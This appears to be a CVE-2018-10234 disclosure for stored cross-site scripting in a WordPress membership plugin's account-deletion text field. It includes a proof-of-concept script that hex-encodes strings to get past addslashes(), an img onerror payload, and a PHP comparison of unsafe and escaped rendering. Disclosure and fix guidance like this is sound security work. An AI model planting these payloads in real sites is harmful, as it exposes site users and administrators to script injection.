CVE-2018-10234

[Suggested description]

Authenticated Cross-Site Scripting exists in the User Profile & Membership plugin before 2.0.11 for WordPress via the "Account Deletion Custom Text" input field on the wp-admin/admin.php?page=um_options&section=account page.

[Additional Information]

In order to execute JavaScript payloads that contain string literals, you need to hex-encode the strings, because the field is passed through addslashes() (which backslash-escapes quote characters). For example:

<script>
    // Rebuilds a string from an array of character codes written as hex
    // literals, so the payload itself contains no quote characters for
    // addslashes() to mangle.
    function hex2a(codes) {
        var str = '';
        for (var index = 0; index < codes.length; ++index) {
            str += String.fromCharCode(codes[index]);
        }
        return str;
    }

    // 0x68 0x74 0x74 0x70 0x3a 0x2f 0x2f is the hex encoding of "http://"
    var decode = [0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f];

    var string = hex2a(decode);
    alert(string);
</script>
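The point behind the hex trick above is that addslashes() only escapes quotes, not HTML. The following is an added example, not code from the Ultimate Member plugin: a hypothetical store-and-render flow for a free-text admin option (render_unsafe, render_safe and has_injected_tag are illustrative names) showing why addslashes() does not prevent stored XSS and what output escaping does instead.

```php
<?php
// Added example, not plugin code: hypothetical handling of a free-text
// admin option, contrasting addslashes() with real HTML output escaping.
// render_unsafe(), render_safe() and has_injected_tag() are illustrative names.

// Constructed payload of the kind a privileged user could save in the field.
// Quotes are included so the effect of addslashes() is visible.
$payload = '<img src=x onerror="alert(document.domain)"> see our "terms"';

// addslashes() backslash-escapes only ' " \ and NUL. Angle brackets survive,
// so the value is still live HTML when echoed into a page. That is exactly
// why the PoC above avoids quoted strings and rebuilds them from hex.
$slashed = addslashes($payload);

// Vulnerable pattern: the option value is concatenated straight into markup.
function render_unsafe(string $custom_text): string
{
    return '<div class="um-deletion-text">' . $custom_text . '</div>';
}

// Hardened pattern: escape for the HTML context at the point of output.
// In WordPress the helper is esc_html(); plain PHP's htmlspecialchars()
// with ENT_QUOTES neutralises < > & " and ' the same way. If limited
// markup must be allowed, filter with wp_kses_post() instead of echoing raw.
function render_safe(string $custom_text): string
{
    $escaped = htmlspecialchars($custom_text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="um-deletion-text">' . $escaped . '</div>';
}

// Review check: does the rendered fragment still carry a tag start inside
// the known wrapper div? Used here to compare the two renderers.
function has_injected_tag(string $html): bool
{
    $prefix = '<div class="um-deletion-text">';
    $inner  = substr($html, strlen($prefix), -strlen('</div>'));
    return preg_match('/<\s*\/?[a-z!]/i', $inner) === 1;
}

printf("addslashes only:  injected tag present = %s\n",
    has_injected_tag(render_unsafe($slashed)) ? 'yes' : 'no');
printf("output escaping:  injected tag present = %s\n",
    has_injected_tag(render_safe($payload)) ? 'yes' : 'no');
```

Running it shows the tag surviving addslashes() and disappearing only with output escaping, which is the check a reviewer would apply to any option value echoed on a front-end page.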

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

https://ultimatemember.com/

[Affected Product Code Base]

User Profile & Membership plugin for WordPress - All versions < 2.0.11

[Affected Component]

User Profile & Membership plugin for WordPress

[Attack Type]

Local

[CVE Impact Other]

Stored Cross Site Scripting

[Attack Vectors]

Authenticated attackers could abuse the "Account Deletion Custom Text"
input field on the following page:

"http://<target>/wp-admin/admin.php?page=um_options&section=account"

to inject malicious JavaScript. Whenever a victim visits the page

"http://<target>/account/"

to manage their account details, the malicious JavaScript will be
executed against the WordPress users/administrators.

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-10234